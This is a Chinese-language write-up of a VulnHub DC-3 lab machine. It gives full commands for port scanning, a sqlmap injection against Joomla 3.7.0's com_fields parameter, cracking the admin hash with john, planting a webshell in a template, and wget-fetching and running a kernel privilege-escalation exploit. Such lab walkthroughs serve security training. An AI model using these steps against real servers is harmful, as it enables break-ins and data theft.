红队打靶 | vulnhub系列:DC-3

admin 2023年6月28日03:22:34评论3 views字数 878阅读2分55秒阅读模式

DC-3打靶记录

环境下载

https://www.vulnhub.com/entry/dc-32,312/

一、扫描主机确定IP

arp-scan -l

红队打靶 | vulnhub系列:DC-3

IP为 192.168.117.143

二、扫描端口

nmap -sS -T4 -A 192.168.117.143 -p 0-65535

全端口SYN 半链接扫描

红队打靶 | vulnhub系列:DC-3

ok的只有个80端口 登录看看

三、访问80端口

红队打靶 | vulnhub系列:DC-3

joomla的

利用kali自带扫描器joomscan 没有的可以安装一下

apt-get update
apt-get install joomscan
joomscan -u http://192.168.117.143

就出来两个东西

版本号 和后台管理的目录
红队打靶 | vulnhub系列:DC-3

找找有没有可以利用的漏洞

searchspolit joomla 3.7.0

红队打靶 | vulnhub系列:DC-3

肯定不用xss啊选择sql注入

cat 一下文件看一下poc

红队打靶 | vulnhub系列:DC-3

利用神器来脱裤

sqlmap -u "http://192.168.117.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering]

红队打靶 | vulnhub系列:DC-3

接下来就脱裤 找admin密码

红队打靶 | vulnhub系列:DC-3

经过加密了

用john来破解密码

john dc-3

红队打靶 | vulnhub系列:DC-3

得到密码 去登陆

找文件上传点放马子

四、getshell

红队打靶 | vulnhub系列:DC-3

找到文件上传点

写马 然后蚁剑连接

红队打靶 | vulnhub系列:DC-3

然后这个bzz3模块的默认地址可以百度
/templates/beez3/ftshell.php

红队打靶 | vulnhub系列:DC-3

开启虚拟终端下一步来提权

红队打靶 | vulnhub系列:DC-3

五、提权

既然没有sudo 呢就看版本来提权

查看版本

cat /proc/version
uname -a

红队打靶 | vulnhub系列:DC-3

然后查找提权的poc

红队打靶 | vulnhub系列:DC-3

红队打靶 | vulnhub系列:DC-3

然后在本地起一个http服务 让服务器下载后压缩执行就行了

python -m http.server 8000
wget http://192.168.117.134/39772.zip

红队打靶 | vulnhub系列:DC-3

下载成功执行脚本提权

./compile.sh
./doubleput

红队打靶 | vulnhub系列:DC-3

原文始发于微信公众号(SecHub网络安全社区):红队打靶 | vulnhub系列:DC-3

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月28日03:22:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队打靶 | vulnhub系列:DC-3https://cn-sec.com/archives/1839989.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息